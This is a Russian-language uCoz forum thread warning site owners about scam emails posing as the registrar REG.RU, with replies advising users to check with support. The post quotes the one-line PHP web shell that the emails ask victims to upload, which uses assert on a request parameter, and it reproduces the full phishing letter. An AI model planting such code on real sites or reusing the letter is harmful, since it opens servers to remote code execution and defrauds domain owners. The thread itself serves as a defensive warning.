|
|
Модератор форума: Yuri_G |
Сообщество uCoz Мастерская uCoz Безопасность сайта Подтверждение прав администратора (письмо от REG.RU) (осторожно! мошенники) |
Подтверждение прав администратора (письмо от REG.RU) |
Внимание! Если вам пришло письмо от имени регистратора домена с требованиями: 1) Установки PHP файла для верификации, активации домена или подтверждения прав владения доменом. Пример содержимого файла, который требуют установить Код <?php assert(stripslashes($_REQUEST[RUCENTER])); ?> 2) Срочной оплаты (дополнительных услуг или ново-введенных сборов). В письме присутствует кнопка оплаты 3) Продления домена. В письме присутствует кнопка оплаты Пример письма с требованиями установить PHP файл Цитата Получено письмо от регистратора доменов REG.RU такого содержания Уважаемый клиент! В соответствии с поправками, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменным именем ***.ru осуществляется лицом, указанным в качестве его администратора. Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменным именем, создайте в корневой директории сайта файл ******.php со следующим содержимым: assert(stripslashes($_REQUEST[REG])); ?> Файл должен быть создан в течение трех рабочих дней с момента получения настоящего уведомления и находиться на сервере до 8 августа 2017 года, 18:00 (UTC+03:00), в противном случае процедура подтверждения будет считаться непройденной. Уведомляем Вас о том, что если процедура подтверждения не будет пройдена, обслуживание домена будет приостановлено. Были зафиксированы случаи писем с требованием установки PHP файла от имени Роскомнадзора!
Прикрепления:
9711875.png
(125.3 Kb)
Сообщение отредактировал webanet - Понедельник, 18 Сен 2017, 21:57:16
|
LikaSelena, это мошенники. прежде чем спешить устанавливать скрипты, всегда пишите в тех.поддержку и спрашивайте у них. в вашем случае надо было написать в тех.поддержку reg.ru можете и сейчас переслать им письмо, чтобы они были в курсе, что данный тип мошенничества до сих пор имеет место быть. раньше такое приходило якобы от ник ру. в любом случае на будущее. скрипты к себе на сайт никакие не устанавливаем не узнав у первоисточника что это такое и зачем/
вот предупреждение от nic.ru https://www.nic.ru/news/2017/alert_27.03.html |
zarim, webanet
Благодарю за предупреждение. Я пыталась отправить письма на указанные там адреса, но они не проходили, а приходили сообщения, что письмо не может быть доставлено. Меня смутило еще то, что домен у меня зарегистрирован в 2domains.ru, а письмо пришло, якобы, от reg.ru, хотя на сайте 2domains.ru и указано, что они официальный партнер. Я также сразу написала и в суппорт 2domains.ru, но ответа пока не получила. Думаю, они поставят в известность своих партнеров по поводу мошенничества. Еще раз спасибо за предупреждение |
| |||
| |||